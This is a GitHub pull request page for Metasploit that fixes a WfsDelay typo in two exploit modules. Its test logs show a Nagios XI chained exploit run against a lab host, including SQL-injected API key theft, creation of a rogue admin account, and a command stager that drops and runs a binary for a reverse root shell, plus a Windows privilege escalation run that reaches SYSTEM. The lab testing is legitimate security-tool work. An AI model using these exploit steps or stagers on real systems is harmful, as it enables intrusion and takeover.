New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Replace WsfDelay with WfsDelay - Fixes #11018 #11019

Merged
merged 2 commits into from Nov 26, 2018

Conversation

Projects
None yet
3 participants
@bcoles
Contributor

bcoles commented Nov 25, 2018

Replace WsfDelay with WfsDelay - Fixes #11018

I haven't tested this fix. Presumably WfsDelay wasn't working due to a typo.

Edit: I've confirmed WfsDelay works as per output below.

@bcoles

This comment has been minimized.

Contributor

bcoles commented Nov 25, 2018

Tested. Works.

msf5 > use exploit/linux/http/nagios_xi_chained_rce_2_electric_boogaloo 
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set rhosts 10.1.1.159
rhosts => 10.1.1.159
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > set verbose true
verbose => true
msf5 exploit(linux/http/nagios_xi_chained_rce_2_electric_boogaloo) > run

[*] Started reverse TCP handler on 10.1.1.197:4444 
[*] STEP 0: Get Nagios XI version string.
[+] STEP 0: Found Nagios XI version: 5.4.10
[*] STEP 1: Setting Nagios XI DB user to root.
[*] STEP 1: Received a 302 Response. That's good!
[*] STEP 2: Exploiting SQLi to extract user API keys.
[*] STEP 2: Received a 302 Response. That's good!
[*] Found 1 unique api keys
[*] 40e54f81856f74bc7011022b745d6efd
[*] STEP 3: Using API Keys to add an administrative user...
[*] STEP 3: trying to add admin user with key 40e54f81856f74bc7011022b745d6efd
[+] Added user:gwsaYTHzzUcydHV password:HLyPIjitlIQuh userid:4
[*] STEP 4.1: Authenticate as user gwsaYTHzzUcydHV with password HLyPIjitlIQuh
[*] STEP 4.1: Get NSP and nagiosxi for login..
[*] STEP 4.1: login_nsp 1066615de153062f732e7842d4bd8b4fac1b556f2d291bc862b7f5171be96bda 
[*] STEP 4.1: login_nagiosxi unuilgmd7q0395bfm66jvqalm2
[*] STEP 4.2: Authenticating...
[*] STEP 4.2: authed_nagiosxi 3j5ag00cmk4knn2vam6oq2u2k0
[*] Generated command stager: ["printf '\\177\\105\\114\\106\\1\\1\\1\\0\\0\\0\\0\\0\\0\\0\\0\\0\\2\\0\\3\\0\\1\\0\\0\\0\\124\\200\\4\\10\\64\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\64\\0\\40\\0\\1\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0\\0\\200\\4\\10\\0\\200\\4\\10\\317\\0\\0\\0\\112\\1\\0\\0\\7\\0\\0\\0\\0\\20\\0\\0\\152\\12\\136\\61\\333\\367\\343\\123\\103\\123\\152\\2\\260\\146\\211\\341\\315\\200\\227\\133\\150\\12\\1\\1\\305\\150\\2\\0\\21\\134\\211\\341\\152\\146\\130\\120\\121\\127\\211\\341\\103\\315\\200\\205\\300\\171\\31\\116\\164\\75\\150\\242\\0\\0\\0\\130\\152\\0\\152\\5\\211\\343\\61\\311\\315\\200\\205\\300\\171\\275\\353\\47\\262\\7\\271\\0\\20\\0\\0\\211\\343\\301\\353\\14\\301\\343\\14\\260\\175\\315\\200\\205\\300\\170\\20\\133\\211\\341\\231\\266\\14\\260\\3\\315\\200\\205\\300\\170\\2\\377\\341\\270\\1\\0\\0\\0\\273\\1\\0\\0\\0\\315\\200'>>/tmp/Fptzg ; chmod +x /tmp/Fptzg ; /tmp/Fptzg ; rm -f /tmp/Fptzg"]
[*] STEP 5.1: executing payload
[*] STEP 5.2: removing scripts from disc
[*] Command Stager progress - 100.00% done (701/701 bytes)
[*] STEP 6.1: Setting Nagios XI DB user to nagiosql.
[*] STEP 6.1: Received a 302 Response. That's good!
[*] STEP 6.2: deleting admin
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (861480 bytes) to 10.1.1.159
[*] Meterpreter session 1 opened (10.1.1.197:4444 -> 10.1.1.159:43598) at 2018-11-24 23:22:42 -0500
[*] Transmitting intermediate stager...(106 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.10.2.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
@bcoles

This comment has been minimized.

Contributor

bcoles commented Nov 25, 2018

Tested. Works.

msf5 exploit(windows/local/ppr_flatten_rec) > run

[*] win32k.sys file version: 5.2.3790.3959
[*] Launching notepad to host the exploit...
[+] Process 1316 launched.
[*] Reflectively injecting the exploit DLL into 1316...
[*] Injecting exploit into 1316 ...
[*] Exploit injected. Injecting payload into 1316...
[*] Payload injected. Executing exploit...
[*] Exploit thread executing (can take a while to run), waiting 30 sec ...
[*] Started bind TCP handler against 172.16.191.171:4444
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[-] The connection was refused by the remote host (172.16.191.171:4444).
[*] Sending stage (179779 bytes) to 172.16.191.171
[*] Meterpreter session 4 opened (172.16.191.196:50123 -> 172.16.191.171:4444) at 2018-11-24 23:58:16 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : USER-40A657CC3B
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 

@busterb busterb self-assigned this Nov 26, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 26, 2018

Thanks @bcoles !

@busterb busterb merged commit 5c06cdc into rapid7:master Nov 26, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request Nov 26, 2018

@busterb

This comment has been minimized.

Contributor

busterb commented Nov 26, 2018

Release Notes

This fixes the nagios_xi_chained_rce_2_electric_boogaloo and ppr_flatten_rec modules to properly respect the WfsDelay option.

msjenkins-r7 added a commit that referenced this pull request Nov 26, 2018

@bcoles bcoles deleted the bcoles:wfsdelay branch Nov 26, 2018

@gdavidson-r7 gdavidson-r7 added the rn-fix label Dec 4, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment